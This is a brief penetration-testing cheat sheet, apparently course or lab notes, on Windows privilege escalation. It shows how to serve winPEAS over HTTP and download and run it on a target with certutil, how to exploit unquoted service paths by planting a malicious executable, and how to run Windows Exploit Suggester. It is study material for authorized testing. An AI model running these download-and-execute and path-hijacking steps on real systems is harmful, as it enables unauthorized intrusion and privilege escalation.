Automated Tools

WinPEAS

• Source: PEASS-ng/winPEAS at master · carlospolop/PEASS-ng · GitHub

• Transfer winpeas via http

python3 -m http.server 80

certutil -urlcache -f <http://10.1.1.4/winpeas.exe> winpeas.exe
.\\winpeas.exe

What To Look For

• Applications/Services that are running as Admin and are unquoted and has spaces.

Example Result from winPEAS

• An unquoted service means it is vulnerable to malicious executable being injected to the directory

• Example:

  • “C:\\Program Files (x86)\\Wise\\Wise Care 365\\BootTime.exe” - Quoted

  • C:\\Program Files (x86)\\Wise\\Wise Care 365\\BootTime.exe - Unquoted

• Windows will try to check for exe for every word on the directory before the space

  • C:\Progam.exe

  • C:\Program Files.exe

  • C:\Program Files (x86)\Wise\Wise.exe

  • C:\Program Files (x86)\Wise\Wise Care.exe

• We can use that vulnerability to insert a malicious executable file on the directory where we have write access such as C:\\Program Files (x86)\\Wise\\

Setting up Windows Exploit Suggester

1. Gather System Info from the Target machine and save it to a file

systeminfo

1. Download Windows Exploit Suggester

2. Update the Database

./windows-exploit-suggester.py --update

1. Install Dependencies

pip install xlrd --upgrade

curl <https://bootstrap.pypa.io/get-pip.py> -o get-pip.py; python get-pip.py

1. Run Windows Exploit Suggester with the Systeminfo

./windows-exploit-suggester.py --database <XLSX_FILE> --systeminfo <SYSTEMINFO_FILE>